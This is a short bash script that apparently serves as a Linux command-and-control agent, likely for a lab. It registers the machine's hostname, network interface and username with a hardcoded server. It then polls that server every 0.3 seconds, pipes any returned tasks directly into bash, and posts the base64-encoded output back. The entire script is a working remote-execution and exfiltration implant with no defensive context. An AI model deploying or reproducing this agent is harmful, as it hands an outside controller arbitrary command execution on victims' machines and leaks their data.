#!/bin/bash
ip="192.168.116.129"
port="8000"
interface="eth0"
n=.3

regl="http://$ip:$port/reg/"

declare -A data=( [eth]=$interface [hname]=$(hostname) )

name=$(curl -X POST -F eth=$interface -F hname=$(hostname) -F username=$(whoami) $regl) 

taskl="http://$ip:$port/tasks/$name/"
resultl="http://$ip:$port/Lin-results/$name/"

while :
do  
    curl $taskl > /tmp/tasks 
    if [ -s /tmp/tasks ]; then
        cat /tmp/tasks | bash > /tmp/results
        base64 /tmp/results > /tmp/enc-result   
        curl -X POST --data "@/tmp/enc-result" $resultl
    fi
    sleep $n    
done

